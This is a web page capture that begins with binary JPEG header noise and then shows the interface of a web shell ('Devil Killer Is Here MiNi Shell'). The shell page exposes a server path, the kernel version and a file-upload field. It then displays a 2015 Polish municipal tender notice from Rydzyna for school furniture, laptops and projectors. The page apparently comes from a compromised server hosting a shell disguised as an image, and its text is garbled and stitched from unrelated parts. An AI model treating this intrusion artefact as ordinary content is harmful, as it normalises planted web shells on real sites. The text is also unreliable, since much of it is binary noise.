JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20150525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20150525/123426-N-2015.html

<p class="kh_header"><b>Rydzyna: Dostawa mebli szkolnych oraz sprzętu do Szkoły Podstawowej w Dąbczu</b><br>
<b>Numer ogłoszenia: 123426 - 2015; data zamieszczenia: 25.05.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rydzyna , ul. Rynek 1, 64-130 Rydzyna, woj. wielkopolskie, tel. 65 5388434, faks 65 5388513.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rydzyna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli szkolnych oraz sprzętu do Szkoły Podstawowej w Dąbczu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mebli szkolnych oraz sprzętu do Szkoły Podstawowej w Dąbczu:
1. Krzesło z siedziskiem i oparciem wykonanym z lakierowanej sklejki w kolorze bukowym; oparcie zaokrąglone, siedzisko profilowane, stelaż z metalowej rury, nóżki wyposażone w zatyczki chroniące podłogę przed zarysowaniem, tylne nóżki z odchyleniem do tyłu zapobiegającym bujaniu się przez dzieci; możliwość sztaplowania; wysokość siedziska 31 cm - 15 sztuk
2. Krzesło z siedziskiem i oparciem wykonanym z lakierowanej sklejki w kolorze bukowym; oparcie zaokrąglone, siedzisko profilowane, stelaż z metalowej rury, nóżki wyposażone w zatyczki chroniące podłogę przed zarysowaniem, tylne nóżki z odchyleniem do tyłu zapobiegającym bujaniu się przez dzieci; możliwość sztaplowania; wysokość siedziska 35 cm - 20 sztuk
3. Krzesło z siedziskiem i oparciem wykonanym z lakierowanej sklejki w kolorze bukowym; oparcie zaokrąglone, siedzisko profilowane, stelaż z metalowej rury, nóżki wyposażone w zatyczki chroniące podłogę przed zarysowaniem z odchyleniem do tyłu zapobiegającym bujaniu się przez dzieci; możliwość sztaplowania; wysokość siedziska 38 cm - 35 sztuk
4. Krzesło z siedziskiem i oparciem wykonanym z lakierowanej sklejki w kolorze bukowym; oparcie zaokrąglone, siedzisko profilowane, stelaż z metalowej rury, nóżki wyposażone w zatyczki chroniące podłogę przed zarysowaniem z odchyleniem do tyłu zapobiegającym bujaniu się przez dzieci; możliwość sztaplowania; wysokość siedziska 43 cm - 30 sztuk
5. Krzesło nauczycielskie tapicerowane w kolorze czarnym, stelaż z rury okrągłej o śr. ok. 25 mm w kolorze czarnym; siedzisko i oparcie tapicerowane; wysokość siedziska 46 cm, szerokość siedziska 45 cm - 4 sztuki
6. Stół 1-osobowy z regulowaną wysokością; blat z płyty o gr. ok. 18 mm, wykończonej obrzeżem PCV o gr. ok. 2 mm, w kolorze bukowym, wym. ok. 70 x 50 cm; stelaż wykonany z profilu płaskoowalnego o przekroju ok. 38 x 20 i 30 x 15 mm; regulowana wysokość od 53 cm do 64 cm; haczyki na tornistry; zatyczki chroniące podłogę przed zarysowaniem - 20 sztuk
7. Stół 1-osobowy z regulowaną wysokością; blat z płyty o gr. ok. 18 mm, wykończonej obrzeżem PCV o gr. ok. 2 mm, w kolorze bukowym, wym. ok. 70 x 50 cm; stelaż wykonany z profilu płaskoowalnego o przekroju ok. 38 x 20 i 30 x 15 mm; regulowana wysokość od 64 cm do 76 cm; haczyki na tornistry; zatyczki chroniące podłogę przed zarysowaniem - 20 sztuk
8. Stół 2-osobowy z regulowaną wysokością; blat z płyty o gr. ok. 18 mm, wykończonej obrzeżem PCV o gr. ok. 2 mm, w kolorze bukowym, wym. ok. 130 x 50 cm; stelaż wykonany z profilu płaskoowalnego o przekroju ok. 38 x 20 i 30 x 15 mm; regulowana wysokość od 53 cm do 64 cm; haczyki na tornistry; zatyczki chroniące podłogę przed zarysowaniem - 26 sztuk
9. Stół 2-osobowy z regulowaną wysokością; blat z płyty o gr. ok. 18 mm, wykończonej obrzeżem PCV o gr. ok. 2 mm, w kolorze bukowym, wym. ok. 130 x 50 cm; stelaż wykonany z profilu płaskoowalnego o przekroju ok. 38 x 20 mm i 30 x 15 mm; regulowana wysokość od 64 cm do 76 cm; haczyki na tornistry; zatyczki chroniące podłogę przed zarysowaniem - 26 sztuk
10. Biurko z płyty laminowanej o gr. ok. 18 mm w kolorze buku, wykończone obrzeżem o gr. ok. 2 mm, wyposażone w 2 szafki i szufladę, zamykane na klucz; wym. ok. 130 x 60 x 76 cm - 4 sztuki
11. Szafa wysoka dwudrzwiowa, wykonana z płyty laminowanej o gr. ok. 18 mm, w kolorze buku; wym. ok. 76 x 40 x 185 cm - 3 sztuki
12. Szafa średnia z 2 półkami, wykonana z płyty laminowanej o gr. ok. 18 mm, w kolorze buku; wym. ok. 76 x 40 x 120 cm - 6 sztuk
13. Regał z szafką, wykonany z płyty laminowanej o gr. ok. 18 mm, w kolorze buku; wym. ok. 76 x 40 x 150 cm -	3 sztuki
14. Komoda wysoka z drzwiczkami, wykonana z płyty laminowanej o gr. 18 mm, w kolorze buku; wym. 76 x 40 x 185 cm - 3 sztuki
15. Regał narożny średni, wykonany z płyty laminowanej o gr. ok. 18 mm, w kolorze buku; wym. ok. 40 x 40 x 120 cm - 6 sztuk
16. Regał wysoki z 4 półkami, wykonany z płyty laminowanej o gr. ok. 18 mm, w kolorze buku; wym. ok. 76 x 40 x 185 cm - 3 sztuki
17. Szafa ubraniowa z 4 schowkami, wykonana z blachy stalowej pokrytej farbą proszkową, drzwi szafek z wywietrznikami oraz miejscem na identyfikator, zamykane zamkiem kluczowym jednopunktowym; wym. ok. 60 x 50 x 180 cm	- 50 sztuk
18. Szafa aktowa wykonana z blachy, wyposażona w półki przestawne oraz dwuskrzydłowe drzwi z zamkiem cylindrycznym, wzmocnione od wewnątrz metalowym profilem zapewniającym wysoką stabilność; wym. ok. 100 x 40 x 200 cm - 1 sztuka
19. Tablica szkolna tryptyk z nadrukiem liniatury i kratki; zielona powierzchnia o właściwościach magnetycznych, powłoka akrylowo-poliestrowa, trwała i odporna na zarysowania, wykonana na ocynkowanej blasze, magnetyczna, rama aluminiowa, wykończona bezpiecznymi narożnikami z tworzywa, skrzydła przymocowane czterema zawiasami, półka aluminiowa na całej długości; wym. ok. 170 (340 po rozłożeniu) x 100 cm - 4 sztuki
20. Suszarka metalowa do prac plastycznych; metalowy stelaż na kółkach ułatwiających przemieszczanie, możliwość pomieszczenia ok. 25 prac formatu A3 lub 50 formatu A4 - 3 sztuki
21. Radioodtwarzacz - moc wzmacniacza 2 W, tuner radiowy FM, odtwarzacz CD i MP3, wyświetlacz LCD, pilot, port USB	- 4 sztuki
22. Głośnik do laptopa - 2 sztuki w komplecie, moc głośników 20 W, pasmo przenoszenia 20-20000 Hz, urządzenia wejścia/wyjścia 1 x stereo mini-jack (audio in) - 4 kmpl
23. Apteczka pierwszej pomocy ze stelażem mocującym do ściany; skład zgodny z normą DIN 13157 PLUS - 5 sztuk
24. Mapa Polski dla najmłodszych - makatka; nazwy miast i charakterystyczne elementy przyczepiane na rzepy - 3 sztuki
25. Godło RP w ramce; wym. ok. 31 x 36 x 2 cm - 5 sztuk
26. Zegar z cyframi - 4 sztuki
27. Projektor multimedialny z uchwytem do instalacji na suficie (4 sztuki):
1) rozdzielczość rzeczywista 1280 x 800 (WXGA) pikseli
2) format obrazu (standard) 16:9
3) ogniskowa obiektywu 21-23,1 mm
4) przesłona 2.56 - 2.8
5) zoom optyczny 1,1 : 1
6) korekcja (Keystone) ? 40 (w pionie) stopni
7) kompatybilność minimum 480i, 480p, 576i, 576p, 720p, 1080i, 1080p)
8) żywotność lampy minimum 4500 godz.) 
9) jasność (tryb normalny) minimum 3200 ANSI lumen
10) kontrast (tryb normalny) 13000 : 1 
11) poziom hałasu (tryb normalny) maksymalnie 33 dB)
12) złącza (wejścia) minimum 1 x HDMI, 2 x D-sub 15-pin,  1 x S-Video, 1 x RS232, 1 x Composite, 1 x audio (Mini Jack), 1 x USB (B))
13) złącza (wyjścia) minimum 1 x D-sub 15-pin, , 1 x audio (Mini Jack))
- pilot 
- baterie do pilota 
- kabel zasilający 
- instrukcja w języku polskim.  
Uwaga!
Uchwyt sufitowy powinien mieć udźwig minimum 2,5 kg i regulację wysokości w zakresie minimum 60cm złożony i minimum 110cm rozłożony z możliwością ukrycia przewodów wewnątrz trzpienia. 
Montaż procesora w odległości 4,20 do 4,50 m od ściany projekcyjnej (kompatybilność z tablicą interaktywną).	
28. Laptop - jednostka centralna komputera przenośnego dla nauczyciela (zwanego komputerem dla nauczyciela) wraz z oprogramowaniem (4 sztuki):
1) ekran o przekątnej minimum 15 cali 
2) procesor o wydajności co najmniej 3025 punktów w teście Passmark CPU Mark według wyników publikowanych na stronie www.cpubenchmark.net/cpu_list.php)
3) pamięć operacyjną RAM minimum 4 GB, w tym wolnego banku pamięci - minimum 1
4) dysk twardy o pojemności minimum 120 GB
5) łącze sieci bezprzewodowej zgodne ze standardem 802.11n 
6) urządzenie odczytu/zapisu DVD+/-RW DL 
7) matrycę typu matowa lub antyrefleksyjna
8) co najmniej 3 złącza USB, w tym co najmniej  złącza typu USB 3,0
9) złącze VGA, HDMI  
10) złącze słuchawkowe
11) zintegrowaną kamerę i mikrofon 
11) zintegrowaną kartę dźwiękową 
12) dodatkowe zewnętrzne urządzenie wskazujące (mysz komputerowa USB) 
13) maksymalny ciężar - 3,0 kilogramy
14) czas pracy na baterii minimum 3 godziny
15) torba 
16) zainstalowanie systemu operacyjnego zgodnego z wyspecyfikowanymi wymaganiami 
17) zainstalowanie pakietu oprogramowania biurowego, zgodnego z wyspecyfikowanymi wymaganiami 
18) zainstalowanie oprogramowania do zarządzania zestawem komputerów dla potrzeb edukacyjnych, wspierania prowadzenia zajęć z wykorzystaniem multimediów oraz systemem zbierania i analizowania odpowiedzi
19) zainstalowanie oprogramowania antywirusowego z możliwością kontroli przez konsole zdalnej administracji oraz chroniące komputer ucznia przed niepożądanymi treściami z Internetu
20) zainstalowanie oprogramowania do obsługi tablicy interaktywnej i innych akcesoriów współpracujących z komputerem (np. wizualizer) 

Wymagania dla oprogramowania:
- System operacyjny z graficznym interfejsem użytkownika w języku polskim, w tym także system interaktywnej pomocy w języku polskim, w tym zlokalizowane w języku polskim, co najmniej następujące elementy: menu, odtwarzacz multimediów, pomoc, komunikaty systemowe. 
- System operacyjny z zintegrowanym systemem aktualizacji darmowych poprawek bezpieczeństwa i komunikacją z użytkownikiem w języku polskim. 
- Możliwość zdalnej automatycznej instalacji, konfiguracji, administrowania oraz aktualizowania systemu. 
- Dostępność bezpłatnej telefonicznej pomocy technicznej dotyczącej systemu operacyjnego świadczonej w języku polskim u producenta sprzętu komputerowego (związane z problemami współdziałania sprzętu i systemu operacyjnego) w cenie połączenia lokalnego
- Dostępność w Internecie na stronach producenta biuletynów technicznych, w tym opisów poprawek bezpieczeństwa, w języku polskim, a także telefonicznej pomocy technicznej producenta systemu operacyjnego świadczonej w języku polskim w dni robocze w godzinach od 8-19 w cenie połączenia lokalnego 
- System operacyjny z publicznie znanym cyklem życia przedstawionym przez producenta i dotyczącym rozwoju i wsparcia technicznego (w szczególności w zakresie bezpieczeństwa), minimum 5 lat wstecz od daty zakupu.
- Możliwość dostosowania do pracy dla osób niepełnosprawnych np. słabowidzących, zgodnie z wymogami Krajowych Ram Interoperacyjności (WCAG 2.0). 
- System operacyjny pozwalający na pracę w różnych sieciach komputerowych (sieci lokalne LAN, Internet), w tym także automatycznie rozpoznawający sieci i ich ustawienia bezpieczeństwa, rozpoznawający automatycznie urządzenia peryferyjne działające w tej sieci (np. drukarki, tablice interaktywne) oraz łączący się automatycznie z raz zdefiniowanymi sieciami. 
- System operacyjny przystosowany do pracy z aplikacjami w modelu chmury obliczeniowej, w szczególności do pracy grupowej i synchronizacji danych (także: przechowywania kopii rezerwowych danych w chmurze obliczeniowej). 
- System operacyjny pozwalający na wdrożenie jednolitej polityki bezpieczeństwa dla wszystkich komputerów w sieci szkolnej.

Oprogramowanie biurowe: 
- edytor tekstów 
- arkusz kalkulacyjny 
- narzędzie do przygotowywania i prowadzenia prezentacji 
- narzędzie do zarządzania informacją osobistą (pocztą elektroniczną, kalendarzem, kontaktami i zadaniami) 
- zainstalowanie na jednym komputerze produktów pochodzących od różnych producentów nie jest uznane za ofertę zintegrowanego pakietu producentów nie jest uznane za ofertę zintegrowanego pakietu 
- pełna polska wersja językowa interfejsu użytkownika, w tym także systemu interaktywnej pomocy w języku polskim 
- system aktualizacji darmowych poprawek bezpieczeństwa, przy czym komunikacja z użytkownikiem powinna odbywać się w języku polskim. 
dostępność w Internecie na stronach producenta biuletynów technicznych, w tym opisów poprawek bezpieczeństwa, w języku polskim, a także telefonicznej pomocy technicznej producenta pakietu biurowego świadczonej w języku polskim w dni robocze w godzinach od 8-19 - cena połączenia nie większa niż cena połączenia lokalnego 
- pakiet musi mieć publicznie znany cykl życia przedstawiony przez producenta, dotyczący rozwoju i wsparcia technicznego - w szczególności w zakresie bezpieczeństwa co najmniej na 5 lat od daty zakupu 
- możliwość dostosowania pakietu aplikacji biurowych do pracy dla osób niepełnosprawnych np. słabo widzących, zgodnie z wymogami Krajowych Ram Interoperacyjności (WCAG 2.0) 
- pakiet aplikacji biurowych powinien obsługiwać formaty dokumentów wymienione w Krajowych Ramach Interoperacyjności oraz powinien prawidłowo współpracować z aplikacjami w modelu chmury obliczeniowej, w szczególności do pracy grupowej i synchronizacji danych 
- rozpoznawanie sieci i ich ustawienia bezpieczeństwa, rozpoznawanie automatycznie urządzenia peryferyjnego działającego w tej sieci (np. drukarki, tablice interaktywne) oraz łączenie się automatycznie z raz zdefiniowanymi sieciami)
29. Tablica interaktywna (4 sztuki) - typu WIT; zestaw: tablica z oprogramowaniem, kamera podczerwieni wraz elementem mocującym, 2 pióra elektroniczne z bateriami, kabel USB, zestaw do montażu na rzutniku, instrukcja obsługi.
Uwaga!
Montaż czujnika podczerwieni w odległości 4,20 do 4,50 m od ściany projekcyjnej..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 30.21.31.00-6, 30.23.60.00-2, 30.23.72.00-1, 48.90.00.00-7, 39.10.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.08.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca wniesie wadium w wysokości: 2.000,00 zł (słownie: dwa tysiące złotych 00/100).
2.         Wadium może być wniesione w jednej lub kilku następujących formach:
2.1. pieniądzu,
2.2. poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
2.3. gwarancjach bankowych,
2.4. gwarancjach ubezpieczeniowych,
2.5. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3.	Wadium w formie pieniężnej należy wpłacić przelewem na rachunek bankowy Zamawiającego - Bank PKO BP SA I oddział w Lesznie,  Nr 65 1020 3088 0000 8102 0005 6424 z dopiskiem na blankiecie przelewu, jakiego postępowania dotyczy. Kserokopię dowodu przelewu należy dołączyć do oferty.
4.   Wadium w formie poręczenia bankowego, gwarancji bankowej, gwarancji ubezpieczeniowej lub poręczenia udzielonego przez Polską Agencję Rozwoju Przedsiębiorczości, należy wnieść poprzez złożenie oryginału dokumentu w miejscu składania ofert. Kserokopię dokumentu należy dołączyć do oferty. Dokument wadialny powinien mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego na pierwsze pisemne żądanie Zamawiającego.
5.     Wadium musi być wniesione przed upływem terminu składania ofert. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym Zamawiającego.
6.      Zamawiający zwraca wadium wszystkim Wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania z wyjątkiem Wykonawcy, którego oferta została wybrana jako najkorzystniejsza.
7.    Wykonawcy, którego oferta została wybrana jako najkorzystniejsza Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia oraz wniesienia zabezpieczenia należytego wykonania umowy.
8.     	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy PZP nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy PZP lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie. 
9.     Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
9.1. odmówił podpisania umowy w sprawie zamówienia publicznego na  warunkach określonych w ofercie, 
9.2. nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
9.3. zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu nie jest wymagane posiadanie specjalnych uprawnień do wykonywania określonej działalności lub czynności.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu Zamawiający nie wymaga szczegółowego wykazania spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu Zamawiający nie wymaga szczegółowego wykazania spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu Zamawiający nie wymaga szczegółowego wykazania spełnienia tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W niniejszym postępowaniu Zamawiający nie wymaga szczegółowego wykazania spełnienia tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin gwarancji - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany z zastrzeżeniem, że zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba, że będą to zmiany wynikające z następujących przesłanek:
a) wystąpią okoliczności, których nie można było przewidzieć w dniu zawarcia umowy,
b) z powodu działania osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rydzyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Rydzyna
ul. Rynek 1
64-130 Rydzyna.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2015 godzina 10:00, miejsce: Urząd Miasta i Gminy Rydzyna
ul. Rynek 1
64-130 Rydzyna
sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





